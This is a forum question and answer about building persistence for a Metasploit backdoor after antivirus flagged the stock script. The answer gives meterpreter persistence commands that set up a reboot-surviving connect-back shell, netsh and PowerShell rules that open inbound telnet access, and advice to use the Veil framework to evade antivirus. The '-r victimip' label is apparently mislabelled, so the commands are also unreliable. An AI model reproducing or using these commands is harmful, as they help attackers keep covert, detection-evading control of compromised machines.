I am trying to design a simple persistence script for Metasploit, considering the one they have is tagged by antivirus. I'm running into some trouble about what the code should look like. Here's my plan: 1. Batch file in startup folder with a loop function 2. Said batch file does a tasklist command and searches for the name of the file on the running processes 3. If it finds the process running it does nothing 4. If it does not see the process running, it simply starts it again It is very simple design but I am running into trouble when i am writing the code. My question is: How do I write this idea into a command? The idea being how the if statement factors into the tasklist command. So I need the tasklist command to be filtered to see if the process is running based on the name, and then I need to set the output of the tasklist command as a variable so that I can write the if statement: if %process%==Client.exe (goto yes)
Asked
Active
Viewed 359 times
1 Answers
0
Metasploit ships with default auxiliary modules. In your scenario, you can work with execute
run metsvc over meterprerter. or
run persistence -U -i <interactive seconds > -p portnumber -r victimip
you can also create rule using netsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
Using Powershell
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
If any AV is detceting your backdoor, Please use veil framework
Mr.Geek
- 23
- 4